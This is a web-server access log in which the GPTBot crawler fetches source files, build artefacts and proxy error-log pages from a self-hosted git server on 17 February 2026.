"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12785] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12788] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13519] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 25098] [Gzip 11.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 14779] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13442] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 30899] [Gzip 16.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 15224] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10515] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10515] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 158478] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 21088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 28481] [Gzip 9.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14441] [Gzip 4.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14418] [Gzip 11.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11052] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" +[17/Feb/2026:16:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11058] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" +[17/Feb/2026:16:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14304] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 27145] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 21290] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10554] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:16:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11302] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 34307] [Gzip 13.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 15225] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10693] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 10147] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 21360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 163197] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17351] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol?display=rendered" [Client 74.7.227.38] [Length 18659] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13379] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15100] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:16:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11035] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11031] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 20795] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13707] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 